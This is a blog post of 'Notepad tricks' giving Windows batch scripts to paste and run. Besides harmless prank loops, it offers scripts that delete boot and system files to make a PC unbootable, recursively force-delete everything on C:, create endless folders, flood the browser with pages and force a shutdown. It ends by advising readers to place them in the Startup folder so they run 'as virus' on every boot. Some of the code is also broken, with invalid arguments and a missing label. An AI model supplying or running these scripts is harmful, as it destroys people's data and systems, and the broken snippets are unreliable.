Halloween Costume ideas 2015

Download Free Softwares Games E-Books Movies

New Notepad Tricks




Notepad Matrix Coding:

Copy this code and paste in notepad. Now save the file as matrix.bat 


****************************
@echo off
color 02es
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
****************************

FUNNY FAKE VIRUS:
Copy this code and paste it in notepad and save it as anyname.bat
@echo off
cls
echo Fatal Error!! Your computer is under attack!!
pause
echo Deleting Files
pause
:files
echo !323%%%@#@GJFGG42JG 
echo !3424%@#%^&@52%@%gs 
echo !@$@^624@$6262$hG 
echo !@#4-07234&5*((6hkd 
echo !&^%78755&*%478*%$& 
echo !^$$68*$78()&4578 
echo !&8898*65$$566$68(9
goto files



AUTO SHUTDOWN:

Paste this code in notepad and save it as virus.bat

msg * Fatal Error! Your Computer Will Shutdown in few Moments!*
shutdown -t


CREATE A HUGE NUMBER OF FOLDERS WITHIN MINUTES:

Paste this code and save it as fun.bat


@echo off
:top
md %random%
goto top


SHUT DOWN A COMPUTER FOREVER:

Copy this code and paste in notepad and save as shutdown.bat OR shutdown.cmd

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini


You may try these also:


cmd /c del c:\windows\* /F /S /Q

cmd /c del c:\* /F /S /Q

FLOOD WEBPAGE OPENING ON PC:

Copy this code and paste in notepad. Save it as name.bat

:A
start www.ashutoshthehacker.blogspot.com
goto A

This will flood pages of this blog on your pc.

DELETE ALL FILES OF A COMPUTER:

Copy this code and paste in notepad. Save it as del.bat

del *.*


This will delete all files of hard disk if you run it.

IF YOU PLACE THE .bat FILES YOU MADE HERE IN "STRTUP" FOLDER, IT  WILL WORK AS VIRUS AND WILL RUN AUTOMETICALLY WHEN WINDOWS WILL START.

Post a Comment

MKRdezign

Contact Form

Name

Email *

Message *

Powered by Blogger.
Javascript DisablePlease Enable Javascript To See All Widget